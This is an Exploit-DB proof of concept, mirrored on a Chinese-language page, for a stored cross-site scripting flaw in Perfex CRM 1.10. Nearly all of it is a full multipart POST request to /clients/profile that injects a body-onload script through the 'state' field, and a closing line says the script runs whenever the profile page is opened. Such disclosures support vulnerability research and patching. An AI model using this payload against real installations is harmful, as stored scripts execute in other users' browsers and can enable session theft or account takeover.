perfexcrm 1.10 – ‘State’ Stored Cross-site scripting (XSS)

  • 作者: Alhasan Abbas
    日期: 2021-07-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50097/
  • # Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
    # Date: 05/07/2021
    # Exploit Author: Alhasan Abbas (exploit.msf)
    # Vendor Homepage: https://www.perfexcrm.com/
    # Version: 1.10
    # Tested on: windows 10
    
    Vunlerable page: /clients/profile
    
    POC:
    ----
    POST /clients/profile HTTP/1.1
    
    Host: localhost
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    
    Accept-Language: en-US,en;q=0.5
    
    Accept-Encoding: gzip, deflate
    
    Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058
    
    Content-Length: 1548
    
    Origin: http://localhost
    
    Connection: close
    
    Referer: http://localhost/clients/profile
    
    Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038
    
    Upgrade-Insecure-Requests: 1
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="profile"
    
    
    
    1
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="profile_image"; filename=""
    
    Content-Type: application/octet-stream
    
    
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="firstname"
    
    
    
    adfgsg
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="lastname"
    
    
    
    fsdgfdg
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="company"
    
    
    
    test
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="vat"
    
    
    
    1
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="phonenumber"
    
    
    
    
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="country"
    
    
    
    105
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="city"
    
    
    
    asdf
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="address"
    
    
    
    asdf
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="zip"
    
    
    
    313
    
    -----------------------------325278703021926100783634528058
    
    Content-Disposition: form-data; name="state"
    
    
    
    ""><body onload=alert("XSS")>">
    
    -----------------------------325278703021926100783634528058--
    
    then any one open profile page in user the xss its executed